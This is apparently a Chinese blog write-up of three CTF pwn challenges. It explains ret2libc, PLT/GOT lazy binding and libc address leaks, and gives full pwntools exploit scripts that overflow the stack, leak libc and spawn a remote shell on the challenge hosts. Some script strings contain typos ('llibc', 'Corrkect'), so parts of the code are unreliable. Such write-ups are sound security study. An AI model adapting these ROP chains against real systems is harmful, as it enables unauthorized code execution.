pwn ret2libc

阅读数: 次 2021-02-04

字数统计: 2k字 | 阅读时长: 8分

1.攻防世界 level3
2.buu babyrop
3.buu ciscn_2019_c_1

1.攻防世界 level3

把文件放到kali里面发现是一个压缩包（放入exeinfo里面也可以发现是压缩包），解压缩得到level3和libc.so文件
在这里插入图片描述
file checksec

ida32

进入漏洞函数vunl（），发现有栈溢出漏洞

没有system函数和/bin/sh
题目提示了用libc。

libc.so是一个函数库（类似于C语言#include<iostream>的iostream库），与level3文件共享函数，也就是level3可以使用libc.so里面包装好的函数

因此我们可以栈溢出后使用libc.so中的system函数和/bin/sh来得到权限，但是ret返回的是一个地址，我们必须知道libc.so中的system函数以及/bin/sh字符串的地址才可以实现getshell

plt表与got表：主函数在调用libc.so中的函数时，有一个延迟绑定机制（由于libc.so中有很多函数，而在程序中只会调用很少一部分函数，因此只有在用到的时候才找libc中的该函数地址，这样可以节省编译时间），调用libc中函数时先让plt表（指向got表）找got表（有函数在libc中的真实地址）中的地址，但是由于延迟绑定，got表中还没有写入地址，就让plt表去找libc中的函数地址，找到后写在got表中，之后再找该函数时就可以找plt表-->got表直接找到函数在libc中的地址，就可以直接使用了

又因为在程序加载时，libc中的地址不固定，但libc中函数的相对位置固定，即地址差值是固定的，所以我们可以通过泄露got表中的某函数（已经调用过的libc中的函数在程序中的真实地址）进行差值计算，而我们可以找到libc中的函数地址，根据差值就可以得到system和/bin/sh在程序中的真实地址了

x86,32位程序调用函数所使用的参数都在栈中，栈中从高地址到低地址顺序是“调用的函数地址，返回的函数地址，调用函数的参数1，参数2，参数3.....

回到本题，在栈溢出之前调用了write（）函数，并且write（）可以写出我们想要的数据（puts函数，printf等函数都可以利用来泄露地址），所以可以利用write（）将write_addr写出来，求出地址差值，计算出system_addr，binsh_addr，同时在用write函数泄露地址时返回到main函数，进行第二次read栈溢出，此时将重新构造的get_shell_payload，发送过去，得到权限。

脚本

#!/usr/bin/env python3
from pwn import*
context(os="linux",arch="i386",log_level="debug")
content=1

#elf
elf=ELF("level3")
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=elf.symbols['main']

#libc
lib=ELF('libc_32.so.6')
lib_write_addr=lib.symbols['write']
lib_system_addr=lib.symbols['system']
lib_binsh_addr=next(lib.search(b'/bin/sh'))

def main():
    if content==0:
        io=process("./level3")
    else:
        io=remote("111.200.241.243",34633)
    #leak_payload  用flat（）和直接"+"拼接一样
    payload=flat([b'a'*(0x88+4),p32(write_plt),p32(main_addr),p32(1),p32(write_got),p32(4)])
    #leak
    io.sendlineafter("Input:\n",payload)
    write_addr=u32(io.recv()[0:4])
    #addr_count
    libcbase=write_addr-lib_write_addr
    system_addr=libcbase+lib_system_addr
    binsh_addr=libcbase+lib_binsh_addr
    #get_shell_payload
    payload=flat([b'a'*(0x88+4),p32(system_addr),b'aaaa',p32(binsh_addr)])
    #getshell
    io.sendlineafter("Input:\n", payload)
    io.interactive()

main()

write函数有三个参数，用法可自行百度

2.buu babyrop

file checksec
在这里插入图片描述
ida32

进入到sub_804871F中，发现虽然有read函数，但无法溢出

返回主函数，进入sub_80487D0

进入buf发现栈大小0xE7，0xC8无法溢出，但如果a1！=127，那么我们就可以用a1控制输入多少，回主函数看a1=v2，v2又是sub_804871F函数中的v5，点进v5发现就在buf下面，我们在输入buf时可以控制v5的大小，但在输入buf后有一个判断函数，比较buf与s如果不相等直接退出，而s被写入了a1，a1是主函数中的buf，从/dev/urandom文件中读入，random意味着是随机数，所以我们只能绕过判断。

stcncmp是对字符串进行比较，strlen作为比较的长度，strlen计算长度截止到/0，所以我们可以用\x00作为payload开头，直接绕过strncmp的比较，把v5覆盖为0xff，就可以栈溢出了，用write函数泄露read函数在程序中的地址，构造payload即可。

脚本

#!/usr/bin/env python3
from pwn import*
#from LibcSearcher import*
context(os="linux",arch="i386",log_level="debug")
content=1
#elf
elf=ELF('./babyrop')
read_plt=elf.plt['read']
read_got=elf.got['read']
main_addr=0x8048825
write_plt=elf.plt['write']
#libc
libc=ELF('llibc-2.23.so')
read_libc=libc.symbols['read']
system_libc=libc.symbols['system']
binsh_libc=next(libc.search(b'/bin/sh'))

def main():
    if content==0:
        io=process("./babyrop")
    else:
        io=remote("node3.buuoj.cn",26729)

    payload1=b"\x00"+b'a'*6+b"\xff"
    payload2=b'a'*(0xE7+4)+p32(write_plt)+p32(main_addr)+p32(1)+p32(read_got)+p32(4)
    io.sendline(payload1)
    #leak
    io.recvuntil("Correct\n")
    io.sendline(payload2)
    read_addr=u32(io.recv()[0:4])
    #libc=LibcSearcher('read',read_addr)
    #payload
    libcbase=read_addr-read_libc
    system_addr=libcbase+system_libc
    binsh_addr=libcbase+binsh_libc
    payload2=b'a'*(0xE7+4)+p32(system_addr)+b'aaaa'+p32(binsh_addr)
    #getshell
    io.sendline(payload1)
    io.recvuntil("Corrkect\n")
    io.sendline(payload2)
    io.interactive()
main()

脚本中有使用LibcSearcher工具，但使用时老是找不到合适的libc文件，就直接在buu libc文件库中下载对应版本的libc文件来使用了。

还有一个根据泄露函数的末尾地址找相应libc函数地址的网站

输入函数名称和泄露出来的最后三位地址（原因应该是x64中段地址的改变不影响末尾的4位地址）（x86不影响末尾2位）（推测）就可以找相应的libc文件中的其他函数地址。

3.buu ciscn_2019_c_1

file checksec
在这里插入图片描述
ida64
进入主函数后初步判断发现只能输入1，否则程序结束

进入encrypt(“%d”, &v4);加密函数

发现有gets栈溢出漏洞，依然是泄露函数地址，这次可以使用puts函数泄露

要注意的是在x64，64位系统中rdi，rsi，rdx，rcx，r8，r9作为调用函数的前6个参数，如果参数多于6个，其余参数放入栈中

所以我们要将我们写入栈中的数据先pop进寄存器中，这也导致了64位系统题目中的payload有所区别

我们可以用ROPgadget工具查找pop对应的地址(注意参数顺序与寄存器顺序相对应)

1	ROPgadget --binary ciscn_2019_c_1 --only 'pop\|ret'

在这里插入图片描述

脚本

#!/usr/bin/env python3
from pwn import*
context(os="linux",arch="amd64",log_level="debug")
content=1

#elf
elf=ELF('ciscn_2019_c_1')
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
main_addr=0x0400B28
pop_ret=0x0400c83
ret = 0x4006b9

#libc
libc=ELF('libc-2.27.so')
puts_libc=libc.symbols['puts']
system_libc=libc.symbols['system']
binsh_libc=next(libc.search(b'/bin/sh'))

def main():
    if content==0:
        io=process("./ciscn_2019_c_1")
    else:
        io=remote("node3.buuoj.cn",28749)
        
    #leak_payload
    payload=b'a'*(0x50+8)+p64(pop_ret)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
    
    #leak
    io.sendlineafter("Input your choice!\n", '1')
    io.sendlineafter("Input your Plaintext to be encrypted\n", payload)
    io.recvuntil("Ciphertext\n")
    io.recvline()
    
    #recive
    puts_addr=io.recv(7)[:-1]
    #x64中地址为12位（8+8-4重叠4位，类比x86中地址4+4-2）6个字节，加上换行1字节，再用切片截出地址
    #print(puts_addr)
    #print(puts_addr.ljust(8,b'\x00'))
    puts_addr=u64(puts_addr.ljust(8,b'\x00')) 
    #填充为8字节栈对齐，注意要先填充再u64解包
    #print(puts_addr)
    
    #addr_count
    libcbase=puts_addr-puts_libc
    system_addr=libcbase+system_libc
    binsh_addr=libcbase+binsh_libc
    
    #getshell_payload
    payload=b'a'*(0x50+8)+p64(ret)+p64(pop_ret)+p64(binsh_addr)+p64(system_addr)
    
    #getshell
    io.sendlineafter("Input your choice!\n", '1')
    io.sendlineafter("Input your Plaintext to be encrypted\n", payload)
    io.recv()
    io.interactive()

main()

对了，getshell_payload中多加了一个ret，好像是为了栈对齐，这个。。。还不太了解。反正加上就行了。。。

以上的ret2libc的原理以及思路都只是个人学习过程中的理解，可能不全面，甚至可能有错误，希望大家可以指出不当的地方。

-------------本文结束感谢您的阅读-------------